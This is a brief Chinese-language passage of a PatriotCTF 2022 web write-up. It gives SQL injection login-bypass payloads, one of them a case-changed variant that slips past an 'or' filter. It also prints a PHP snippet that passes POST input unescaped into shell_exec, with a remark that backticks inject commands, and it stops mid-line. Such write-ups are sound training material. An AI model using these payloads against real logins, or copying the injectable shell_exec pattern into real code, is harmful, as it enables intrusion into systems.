PatriotCTF 2022 + NahamCon CTF 2022 部分wp
PatriotCTF 2022
https://ctftime.org/event/1616/tasks/
被队友取证题带飞了(
web
Rock and Roll
The website is blank! I can’t see anything. Can you help me
find what’s hidden?
Inspector Clouseau
Apocalypse Security - 1
username=1&password=1' or '1'='1
Apocalypse Security - 2
过滤了or,大写绕过即可
username=a&password=1'+Or+'1'%3d'1
Spongebob
给了main.php源码
<?php
$text = $_POST['text'];
$command = "python3.9 memetext.py \"$text\"";
$out = shell_exec($command);
echo $out;
?>
fuzz出来的``可以用
text